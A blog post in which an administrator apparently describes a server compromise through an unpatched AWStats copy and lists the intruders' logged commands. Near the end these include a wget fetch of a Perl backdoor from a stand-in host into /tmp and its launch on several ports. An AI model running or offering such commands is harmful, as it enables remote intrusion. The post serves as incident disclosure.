I’m not sure how bad the damage is yet. They got in yesterday through an installation of AWStats that hadn’t been upgraded. We upgraded our main installation but there was another copy that they found. We’re in pretty good company though, Russell Beattie and Jeremy Zawdony got hit with the same thing.
They jumped around IPs using proxy servers, it looks like we were scanned a few times before someone decided to exploit it. The scanner attempts to run the ‘id’ command and if it gets output it figures it found a vulnerable server.
Once inside they created a directory in /tmp called ‘.,’ and put some privilege escalation exploits in there. Not sure what happened after that, their shell’s history file was /dev/null.
The only reason me and a couple other people noticed was because the server was super slow. I guess if script kiddees backdoors were better written, they’d probably be good enough coders to do something worthwhile with their adolescence.
Luckily we found it before they deleted anything, but we’re still checking stuff out and making sure we’ve eradicated them from the system. That’s pretty much all we can do in the short term, although an OS reload looks like it’s in our future.
For those that are interested I’ve put the commands they ran through AWStats in the full entry. Condolences gladly accepted, admonishments for not finding and upgrading all copies of a vulnerable program are not necessary.
Here’s what they did:
uname 0a # Note the typo, so it wasn't automated
bd.pl is basically a poorly written telnet server that takes the port as the argument
cd /tmp;wget example.net/bd/bd.pl # changed to protect what I assume is another hacked site
cd /tmp;perl bd.pl 123456
cd /tmp;perl bd.pl 12345
cd /tmp;perl bd.pl 1235